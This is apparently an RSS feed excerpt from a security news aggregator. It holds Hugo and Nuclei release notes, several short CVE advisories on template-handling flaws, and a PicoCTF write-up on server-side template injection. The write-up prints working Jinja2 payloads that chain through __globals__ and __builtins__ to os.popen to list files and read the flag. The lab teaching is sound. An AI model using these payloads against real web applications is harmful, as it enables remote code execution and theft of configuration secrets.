<li>build(deps): bump golang.org/x/image from 0.42.0 to 0.43.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/5ad28461618c49b46f143c61a30946961e6673b7/hovercard" href="https://github.com/gohugoio/hugo/commit/5ad28461618c49b46f143c61a30946961e6673b7"><tt>5ad2846</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump golang.org/x/net from 0.55.0 to 0.56.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/36ad9f583af1565b0945cabcc1e82cca80bf0ce5/hovercard" href="https://github.com/gohugoio/hugo/commit/36ad9f583af1565b0945cabcc1e82cca80bf0ce5"><tt>36ad9f5</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/pelletier/go-toml/v2 from 2.4.2 to 2.4.3 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/7c0a0bc97983b106e76cd58e0771bd9324af33bd/hovercard" href="https://github.com/gohugoio/hugo/commit/7c0a0bc97983b106e76cd58e0771bd9324af33bd"><tt>7c0a0bc</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/getkin/kin-openapi from 0.139.0 to 0.140.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/a879ebfaaa08c784855b0f03eca0b5579034074a/hovercard" href="https://github.com/gohugoio/hugo/commit/a879ebfaaa08c784855b0f03eca0b5579034074a"><tt>a879ebf</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump golang.org/x/mod from 0.36.0 to 0.37.0 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/332d5ec823f60510314e8bdddbefff6df189ea16/hovercard" href="https://github.com/gohugoio/hugo/commit/332d5ec823f60510314e8bdddbefff6df189ea16"><tt>332d5ec</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>build(deps): bump github.com/pelletier/go-toml/v2 from 2.3.1 to 2.4.2 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/212cc11adae1deafc014b6356f8a71ecda1f277e/hovercard" href="https://github.com/gohugoio/hugo/commit/212cc11adae1deafc014b6356f8a71ecda1f277e"><tt>212cc11</tt></a> <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot]</li>
<li>deps: Upgrade github.com/evanw/esbuild v0.28.0 =&gt; v0.28.1 <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/884439b9a21dfbc4ac28e8534ef3764d04db0ab3/hovercard" href="https://github.com/gohugoio/hugo/commit/884439b9a21dfbc4ac28e8534ef3764d04db0ab3"><tt>884439b</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4647621217" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15033" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/15033/hovercard" href="https://github.com/gohugoio/hugo/pull/15033">#15033</a></li>
<li>deps: Add Chroma dark/light mode support <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/790a8aa47412bf32c297250f949cb1fd811a0fbf/hovercard" href="https://github.com/gohugoio/hugo/commit/790a8aa47412bf32c297250f949cb1fd811a0fbf"><tt>790a8aa</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bep">@bep</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4620263454" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15017" data-hovercard-type="pull_request" data-hovercard-url="/gohugoio/hugo/pull/15017/hovercard" href="https://github.com/gohugoio/hugo/pull/15017">#15017</a></li>
</ul>
<h2>Documentation</h2>
<ul>
<li>markup/pandoc: Add citation support <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gohugoio/hugo/commit/128fb17c2b1fd29bbfbce868af1813ad35d31b2a/hovercard" href="https://github.com/gohugoio/hugo/commit/128fb17c2b1fd29bbfbce868af1813ad35d31b2a"><tt>128fb17</tt></a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmooring/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmooring">@jmooring</a> <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736517776" data-permission-text="Title is private" data-url="https://github.com/gohugoio/hugo/issues/15062" data-hovercard-type="issue" data-hovercard-url="/gohugoio/hugo/issues/15062/hovercard" href="https://github.com/gohugoio/hugo/issues/15062">#15062</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.11.0]]></title>
<description><![CDATA[What's Changed
⚠️ Breaking Change: Signed templates required for JavaScript protocol
Starting with v3.11.0, custom templates that use the javascript: protocol must be digitally signed before Nuclei will load or execute them. Unsigned JavaScript templates are now skipped during template loading an...]]></description>
<link>https://tsecurity.de/de/3647998/it-security-tools/v3110/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647998/it-security-tools/v3110/</guid>
<pubDate>Mon, 06 Jul 2026 09:03:34 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<h3><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Breaking Change: Signed templates required for JavaScript protocol</h3>
<p>Starting with v3.11.0, <strong>custom templates that use the <code>javascript:</code> protocol must be digitally signed</strong> before Nuclei will load or execute them. Unsigned JavaScript templates are now skipped during template loading and when referenced from workflows.</p>
<p><strong>Why this change</strong></p>
<p>This release continues the security hardening started in v3.10.0 (sandbox enforcement, network policy checks, stricter code-template handling, YAML include protections, and related fixes in <a href="https://github.com/projectdiscovery/nuclei/pull/7469" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7469/hovercard">#7469</a>). The JavaScript protocol exposes Go-backed modules through Nuclei's JS runtime, which significantly increases attack surface compared with request-only templates. Requiring signatures brings JavaScript templates in line with the existing protections for code-protocol templates.</p>
<p><strong>Who is affected</strong></p>
<table>
<thead>
<tr>
<th>Scenario</th>
<th>Impact</th>
</tr>
</thead>
<tbody>
<tr>
<td>Default scans using <a href="https://github.com/projectdiscovery/nuclei-templates">nuclei-templates</a></td>
<td><strong>No action needed</strong> - official templates are pre-signed and verified with ProjectDiscovery's public key</td>
</tr>
<tr>
<td>Custom/private templates using <code>javascript:</code></td>
<td><strong>Action required</strong> - sign templates before use</td>
</tr>
<tr>
<td>Templates using only <code>flow:</code> (e.g. <code>flow: http(1)</code>) without <code>javascript:</code></td>
<td><strong>No change</strong></td>
</tr>
<tr>
<td>Workflows referencing unsigned JavaScript sub-templates</td>
<td>Those sub-templates are skipped</td>
</tr>
</tbody>
</table>
<p><strong>What to do</strong></p>
<p>Sign your custom templates with:</p>
<div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="nuclei -sign -t /path/to/your-template.yaml"><pre>nuclei -sign -t /path/to/your-template.yaml</pre></div>
<p>See the <a href="https://docs.projectdiscovery.io/templates/reference/template-signing" rel="nofollow">Template Signing documentation</a> for key generation, verification, and signing templates that reference external JavaScript or code files.</p>
<hr>
<h3>🔒 Security</h3>
<ul>
<li>feat(templates): require signatures for javascript templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4778548882" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7514" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7514/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7514">#7514</a></li>
</ul>
<h3>Other Changes</h3>
<ul>
<li>bump x/crypto and go-pkcs12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788406503" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7516" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7516/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7516">#7516</a></li>
<li>general maintenance and cleanup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695491031" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/7469" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/7469/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/7469">#7469</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/projectdiscovery/nuclei/compare/v3.10.0...v3.11.0"><tt>v3.10.0...v3.11.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PicoCTF Web Exploitation Easy Category Web Challenge [SSTL 1]]]></title>
<description><![CDATA[Photo by Alexandre Debiève on UnsplashChallenge Statement :- I made a cool website where you can announce whatever you want! Try it out. Additional details will be available after launching your challenge instance .Now here in this website we have to make the announcements and then observe the re...]]></description>
<link>https://tsecurity.de/de/3647971/hacking/picoctf-web-exploitation-easy-category-web-challenge-sstl-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647971/hacking/picoctf-web-exploitation-easy-category-web-challenge-sstl-1/</guid>
<pubDate>Mon, 06 Jul 2026 08:53:07 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*cYjIyehGu_igLY8t"><figcaption>Photo by <a href="https://unsplash.com/@alexkixa?utm_source=medium&amp;utm_medium=referral">Alexandre Debiève</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><ul><li><strong>Challenge Statement</strong> :- I made a cool website where you can announce whatever you want! Try it out. Additional details will be available after launching your challenge instance .</li><li>Now here in this website we have to make the announcements and then observe the response . So from the challenge we have known that here we have to implement the Server Side Template Injection .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FO3Rp5BJv0cploQJDUHpbQ.png"><figcaption>Challenge Photo</figcaption></figure><ul><li><strong>Templates</strong> :- This are the files that enables the the developers to generate the dynamic web pages by placing the placeholders for the variables. Because other wise this would become a manual tedious job for them to update the variable for each user. This is done automatically by the template engine .</li><li><strong>Server Side Template Injection</strong> :- This is the type of injection that occurs in the templates when it does not properly validate the user input and sometimes also executes the user instructions in some of the cases . For example in the image below .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*vDjdFET7SAvLAIIbMzLHxA.png"><figcaption>Example</figcaption></figure><ul><li>Now what happens is that it becomes dangerous because it allows for the remote code execution, access to the configurations objects, secret keys and system internals and etc .</li><li>So first in the challenge we will start by checking that which of the template is being used in this challenge and then we will construct our payload . So we will give the inputs like {{ 8*8 }}, ${ 8*8 } and then notice where does it gives the answer .</li><li><strong>Checking for {{ 8*8 }}</strong></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*D7cz59WvLBzx7uMovm1AOQ.png"><figcaption>{{ 8* 8 }}</figcaption></figure><ul><li>So in this we got the output . Let’s Try Others As Well .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/888/1*Ap5KeXTZyhIbuTnV6SX7Pw.png"><figcaption>As it is Output for Others</figcaption></figure><ul><li>So we saw that in other cases we did not get the result it just produced the as it is input. So know we have known that this template executes the instructions inside the <strong><em>{{variable }} </em></strong>.</li><li>So below in the image i have attached the some of the types of templates with their supported formats and the languages.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*ooWR4Jj5mefdBde0BX3jVw.png"><figcaption>Template Types</figcaption></figure><ul><li>So from this we can get the idea that the template in our webpage can be the Jinja2, Handlebar, Twig. So first we test for the Jinja2 by inserting the {{ config }}, {{ self }} etc .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/889/1*aU4NJo4CwFmXmUR-RVRZ9Q.png"><figcaption>{{ config }} and{{ self }}</figcaption></figure><ul><li>And yes we got he valid output for the {{ self }} and {{ config }} and this confirms the Jinja2 template so now before seeing to the final payload we must first understand some of the import functions, dictionaries, objects, commands to fully understand the final payloads .</li><li><strong><em>{{ config }}</em></strong><em> :- This is flask configuration object which contains the configuration files information, secret keys, database urls, settings, session configurations. Below we have tried for the {{ config }}, {{ config.items }}, {{ config.__class__.__init__.__globals__ }} .</em></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/623/1*a_Q4QAPh3rACoAgEtZ3DtA.png"><figcaption><em>{{ config }}, {{ config.items }}, {{ config.__class__.__init__.__globals__ }}</em></figcaption></figure><ul><li><strong><em>{{ request }} </em></strong><em>:- It is the flask request object which represents the current HTTP request . Here we have checked for the {{ request.application }}, {{ request.method }}, {{ request.url }}, {{ request.headers }} .</em></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/617/1*qm7CHdzsP75p8wOWr1TYTg.png"><figcaption><em>{ request.application }}, {{ request.method }}, {{ request.url }}, {{ request.headers }}</em></figcaption></figure><ul><li><strong><em>{{ self }}</em></strong><em> :- This is the template reference object which sometimes information about the system internals. Generally we test for the {{ self }}, {{ self.__init__.__globals__ }} .</em></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/616/1*HvkqlX7TTG1j5VP9pVP05Q.png"><figcaption><em>{{ self.__init__.__globals__ }}</em></figcaption></figure><ul><li>{{__init__}} :- This is the constructor method object .</li><li>{{__globals__}} :- This is the dictionary of the every object which contains all the global variables, built in preferences, tools, libraries, functions .</li><li>{{__import__(’os’) }} :- This function is executed when we write the import os in the code .</li><li>popen(’ls’).read() :- This is used for the execution of the command on the system and read() is used for the human readable text produced otherwise we will get the object reference output .</li><li>{{__builtins__}} :- This contains the various libraries and functions like import, open, exec, eval and etc .</li><li>So we have understood the all the necessary concepts now we have used the 4 types of payload that would give us the flag. The above explanation will help to connect each every component of payload that why we wrote this object, library in this. So here are they :-</li></ul><p><em>{{ self.__init__.__globals__.__builtins__.__import__(’os’).popen(’ls’).read() }}</em></p><p><em>{{ self.__init__.__globals__.__builtins__.open(’flag’) }}</em></p><p><em>{{ request.application.__globals__.__builtins__.__import__(’os’).popen(’ls’).read() }}</em></p><p><em>{{ config.__class__.__init__.__globals__[’os’].popen(’cat flag’).read() }}</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/755/1*y0iGbjMklFnLTYABwjjTUQ.png"><figcaption>Flag</figcaption></figure><ul><li>Learning of the concepts of from this writeup :-</li><li>Template and Template Meaning .</li><li>Server Side Template Injection Meaning .</li><li>Jinja2, Handlebar, Freemaker, Twig, Smarty, ERB Templates and Their Formats .</li><li>{{ config }}, {{ request }}, {{ self }}.</li><li>popen, read, init, globals, import functions and dictionaries .</li></ul><p><strong>Final Takeway</strong></p><p><em>Easy challenges are not about “easy flags”. They are about building the foundation for harder ones .</em></p><p><em>This SSTI challenge was not just about typing </em><em>{{ 8*8 }} and seeing 64.</em></p><p><em>It was about training your brain to:</em></p><p><em>a. Identify template engines instead of guessing blindly.</em></p><p><em>b. Test payload patterns methodically.</em></p><p><em>c. Understand why </em><em>{{ }} works but </em><em>${ } doesn’t.</em></p><p><em>d. Explore objects like </em><em>config, </em><em>request, and </em><em>self with intent.</em></p><p><em>e. Trace how </em><em>__init__, </em><em>__globals__, and </em><em>__builtins__ connect internally.</em></p><p><em>Most people stop when they get code execution. But the real learning starts when you ask:</em></p><p><em>Why did this payload work?</em></p><p><em>How did it reach the </em><em>os module?</em></p><p><em>What object chain allowed access to system commands?</em></p><p><em>How does Jinja2 expose Python internals?</em></p><p><em>It is about understanding how templating engines process input. It is about understanding how templating engines process input. How objects are structured in memory. How Python exposes global namespaces. How unsafe rendering turns logic into execution.</em></p><p><em>If you only copy-paste payloads, you will solve easy challenges. If you understand the object traversal path, you will solve the hard ones. CTFs are not about the flag. They are about learning how applications actually break.</em></p><p><em>Go deeper than the payload. Go deeper than the writeup. Go deeper than the solution.</em></p><p><em>More templates. More internals. More real exploitation.</em></p><h3>Happy Hacking.</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*9kQQiZ6yFCdNq8tM"><figcaption>Photo by <a href="https://unsplash.com/@clarktibbs?utm_source=medium&amp;utm_medium=referral">Clark Tibbs</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1fc109221169" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/picoctf-web-exploitation-easy-category-web-challenge-sstl-1-1fc109221169">PicoCTF Web Exploitation Easy Category Web Challenge [SSTL 1]</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-18324 | Intelliants Subrion CMS 4.2.1 Kickstart Template q cross site scripting]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Intelliants Subrion CMS 4.2.1. This issue affects some unknown processing of the component Kickstart Template. The manipulation of the argument q leads to cross site scripting.

This vulnerability is documented as CVE-2020-18324. The ...]]></description>
<link>https://tsecurity.de/de/3647817/sicherheitsluecken/cve-2020-18324-intelliants-subrion-cms-421-kickstart-template-q-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647817/sicherheitsluecken/cve-2020-18324-intelliants-subrion-cms-421-kickstart-template-q-cross-site-scripting/</guid>
<pubDate>Mon, 06 Jul 2026 07:24:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/intelliants:subrion_cms">Intelliants Subrion CMS 4.2.1</a>. This issue affects some unknown processing of the component <em>Kickstart Template</em>. The manipulation of the argument <em>q</em> leads to cross site scripting.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2020-18324">CVE-2020-18324</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-46114 | jpress up to 4.2.0 Email Template code injection (Issue 172)]]></title>
<description><![CDATA[A vulnerability was found in jpress up to 4.2.0. It has been rated as critical. The affected element is an unknown function of the component Email Template Handler. The manipulation leads to code injection.

This vulnerability is documented as CVE-2021-46114. The attack can be initiated remotely....]]></description>
<link>https://tsecurity.de/de/3647392/sicherheitsluecken/cve-2021-46114-jpress-up-to-420-email-template-code-injection-issue-172/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647392/sicherheitsluecken/cve-2021-46114-jpress-up-to-420-email-template-code-injection-issue-172/</guid>
<pubDate>Mon, 06 Jul 2026 00:24:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/jpress">jpress up to 4.2.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is an unknown function of the component <em>Email Template Handler</em>. The manipulation leads to code injection.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2021-46114">CVE-2021-46114</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-46118 | jpress up to 4.2.0 Email Template code injection (Issue 170)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in jpress up to 4.2.0. Affected is an unknown function of the component Email Template Handler. Executing a manipulation can lead to code injection.

The identification of this vulnerability is CVE-2021-46118. The attack may be launched remotely. T...]]></description>
<link>https://tsecurity.de/de/3647391/sicherheitsluecken/cve-2021-46118-jpress-up-to-420-email-template-code-injection-issue-170/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647391/sicherheitsluecken/cve-2021-46118-jpress-up-to-420-email-template-code-injection-issue-170/</guid>
<pubDate>Mon, 06 Jul 2026 00:24:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/jpress">jpress up to 4.2.0</a>. Affected is an unknown function of the component <em>Email Template Handler</em>. Executing a manipulation can lead to code injection.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2021-46118">CVE-2021-46118</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-46115 | jpress up to 4.2.0 Template unrestricted upload (Issue 169)]]></title>
<description><![CDATA[A vulnerability has been found in jpress up to 4.2.0 and classified as critical. This affects an unknown part of the component Template Handler. This manipulation causes unrestricted upload.

This vulnerability is tracked as CVE-2021-46115. The attack is possible to be carried out remotely. No ex...]]></description>
<link>https://tsecurity.de/de/3647388/sicherheitsluecken/cve-2021-46115-jpress-up-to-420-template-unrestricted-upload-issue-169/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647388/sicherheitsluecken/cve-2021-46115-jpress-up-to-420-template-unrestricted-upload-issue-169/</guid>
<pubDate>Mon, 06 Jul 2026 00:24:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/jpress">jpress up to 4.2.0</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the component <em>Template Handler</em>. This manipulation causes unrestricted upload.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2021-46115">CVE-2021-46115</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-46116 | jpress up to 4.2.0 Template code injection (Issue 168)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in jpress up to 4.2.0. This impacts an unknown function of the component Template Handler. Performing a manipulation results in code injection.

This vulnerability was named CVE-2021-46116. The attack may be initiated remotely. There is no ava...]]></description>
<link>https://tsecurity.de/de/3647383/sicherheitsluecken/cve-2021-46116-jpress-up-to-420-template-code-injection-issue-168/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647383/sicherheitsluecken/cve-2021-46116-jpress-up-to-420-template-code-injection-issue-168/</guid>
<pubDate>Mon, 06 Jul 2026 00:24:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/jpress">jpress up to 4.2.0</a>. This impacts an unknown function of the component <em>Template Handler</em>. Performing a manipulation results in code injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2021-46116">CVE-2021-46116</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-46117 | jpress up to 4.2.0 Email Template code injection (Issue 171)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in jpress up to 4.2.0. This affects an unknown function of the component Email Template Handler. Such manipulation leads to code injection.

This vulnerability is uniquely identified as CVE-2021-46117. The attack can be launched remotely. ...]]></description>
<link>https://tsecurity.de/de/3647381/sicherheitsluecken/cve-2021-46117-jpress-up-to-420-email-template-code-injection-issue-171/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647381/sicherheitsluecken/cve-2021-46117-jpress-up-to-420-email-template-code-injection-issue-171/</guid>
<pubDate>Mon, 06 Jul 2026 00:24:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/jpress">jpress up to 4.2.0</a>. This affects an unknown function of the component <em>Email Template Handler</em>. Such manipulation leads to code injection.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2021-46117">CVE-2021-46117</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-36582 | Kooboo CMS 2.1.1.0 reverse-shell.aspx unrestricted upload]]></title>
<description><![CDATA[A vulnerability was found in Kooboo CMS 2.1.1.0. It has been classified as critical. The impacted element is an unknown function of the file /Content/Template/root/reverse-shell.aspx. Performing a manipulation results in unrestricted upload.

This vulnerability is reported as CVE-2021-36582. The ...]]></description>
<link>https://tsecurity.de/de/3646801/sicherheitsluecken/cve-2021-36582-kooboo-cms-2110-reverse-shellaspx-unrestricted-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646801/sicherheitsluecken/cve-2021-36582-kooboo-cms-2110-reverse-shellaspx-unrestricted-upload/</guid>
<pubDate>Sun, 05 Jul 2026 15:53:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/kooboo:cms">Kooboo CMS 2.1.1.0</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is an unknown function of the file <em>/Content/Template/root/reverse-shell.aspx</em>. Performing a manipulation results in unrestricted upload.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2021-36582">CVE-2021-36582</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2017-17677 | BMC Remedy 9.1SP3 BIRT Template permission assignment]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in BMC Remedy 9.1SP3. The affected element is an unknown function of the component BIRT Template Handler. The manipulation leads to incorrect permission assignment.

This vulnerability is traded as CVE-2017-17677. Access to the ...]]></description>
<link>https://tsecurity.de/de/3646595/sicherheitsluecken/cve-2017-17677-bmc-remedy-91sp3-birt-template-permission-assignment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646595/sicherheitsluecken/cve-2017-17677-bmc-remedy-91sp3-birt-template-permission-assignment/</guid>
<pubDate>Sun, 05 Jul 2026 12:53:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/bmc:remedy">BMC Remedy 9.1SP3</a>. The affected element is an unknown function of the component <em>BIRT Template Handler</em>. The manipulation leads to incorrect permission assignment.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2017-17677">CVE-2017-17677</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-35274 | DotCMS Add Template with Admin Panel 20.11 cross site scripting (Exploit 49168 / EDB-49168)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in DotCMS Add Template with Admin Panel 20.11. This impacts an unknown function. The manipulation leads to cross site scripting.

This vulnerability is uniquely identified as CVE-2020-35274. The attack is possible to be carried out remot...]]></description>
<link>https://tsecurity.de/de/3646127/sicherheitsluecken/cve-2020-35274-dotcms-add-template-with-admin-panel-2011-cross-site-scripting-exploit-49168-edb-49168/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646127/sicherheitsluecken/cve-2020-35274-dotcms-add-template-with-admin-panel-2011-cross-site-scripting-exploit-49168-edb-49168/</guid>
<pubDate>Sun, 05 Jul 2026 04:38:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
